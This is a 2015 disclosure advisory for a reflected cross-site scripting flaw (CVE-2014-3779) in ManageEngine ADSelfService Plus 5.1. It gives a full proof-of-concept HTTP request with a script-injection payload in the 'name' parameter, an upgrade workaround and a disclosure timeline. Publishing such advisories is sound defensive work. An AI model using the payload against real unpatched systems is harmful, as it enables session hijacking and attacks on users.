Security Advisory : 
Exploit Title: 
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 03-01-2015
Vendor Homepage : 
Software Link : N/A

Version :

ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial

Tested on :

Windows XP SP2 -Host machine ,Windows server 2003 as Active directory

CVE-2014-3779

Type of Application :  Web application

Release mode : Coordinated disclosure

Vulnerability Description : 
It is observed that the Manageengine ADSelfservice Plus  is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and
the unfiltered input is reflected to the user 


Proof of concept :

Request :

POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on


Parameter affected:

name

Payload (Exploit Code):

"";</script><script>alert(0)</script><"

Vulnerable link: 

192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription 



Tools used :

Mozilla firefox browser v28.0 , Burp proxy free edition v1.5


## Workaround ##
----------------
Update to newer Version 5.2 Build 5202 
http://www.manageengine.com/products/self-service-password/download.html?btmMenu 
 
## TimeLine ##
----------------------
13th Apr 2014 : Bug Discovered
15th Apr 2014 : vendor was notified by e-mail
16th Apr 2014 : Vendor response received
13th  May 2014 : Vendor acknowledged and released a patch
22nd  May 2014 : Mitre Team provided CVE id
03rd Jan 2015 : Public Disclosure